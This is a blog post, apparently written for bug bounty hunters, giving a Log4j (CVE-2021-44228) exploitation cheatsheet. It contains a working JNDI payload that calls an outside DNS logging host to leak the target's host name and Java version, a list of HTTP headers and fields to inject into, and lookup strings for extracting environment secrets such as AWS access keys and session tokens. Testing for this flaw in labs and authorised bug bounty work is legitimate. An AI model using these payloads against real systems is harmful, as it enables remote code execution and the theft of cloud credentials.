DEV Community

Cover image for Log4j Vulnerability Cheatsheet
Anton
Anton

Posted on

Log4j Vulnerability Cheatsheet

Description

Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged. CVE-2021–44228

Affected versions - Apache log4j 2.0-beta9 ≤ 2.14.1

How It Works

Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters

https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}
Enter fullscreen mode Exit fullscreen mode
  1. You can use a service dnslog.cn to create your DNS subdomain for a test. Example: qwe3er.dnslog.cn

  2. Use this subdomain to craft a payload and send it with the request. Check request to DNS service after some time for confirmation of successful callback

  3. You should receive a similar request to DNS service (with Host & Java Version): jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn

Test Environments

You can use provided test environments to inspect the behavior of this vulnerability

Challenges & Labs (Rooms)

You can use created challenges, labs (rooms) for practice

How To Identify (Services)

Use these websites to create DNS address (token) for payload

How To Identify (Scanners)

Use these scanners to check if target website is vulnerable

List of Places where Payload can be Injected

Email header, Username, Password, E-mail address, Filename, Query/Body, File content, Document/Image EXIF, or inside of any of these Headers:

Authorization
Cache-Control
Cf-Connecting_ip
Client-Ip
Contact
Cookie
Forwarded-For-Ip
Forwarded-For
Forwarded
If-Modified-Since
Originating-Ip
Referer
True-Client-Ip
User-Agent
X-Api-Version
X-Client-Ip
X-Forwarded-For
X-Leakix
X-Originating-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-Ip
X-Wap-Profile
Authorization: Basic
Authorization: Bearer
Authorization: Oauth
Authorization: Token
Enter fullscreen mode Exit fullscreen mode

What Information can be Extracted

${hostName}
${sys:user.name}
${sys:user.home}
${sys:user.dir}
${sys:java.home}
${sys:java.vendor}
${sys:java.version}
${sys:java.vendor.url}
${sys:java.vm.version}
${sys:java.vm.vendor}
${sys:java.vm.name}
${sys:os.name}
${sys:os.arch}
${sys:os.version}
${env:JAVA_VERSION}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:AWS_PROFILE}
${env:AWS_CONFIG_FILE}
${env:AWS_ACCESS_KEY_ID}
Enter fullscreen mode Exit fullscreen mode

Video Edition is available on

Static Version Shared On


That's all for now

  1. Share the word about this article
  2. Follow me @therceman

I tweet & write about Bug Bounty Hunting
Cheers, Happy Hunting 👍

Discussion (0)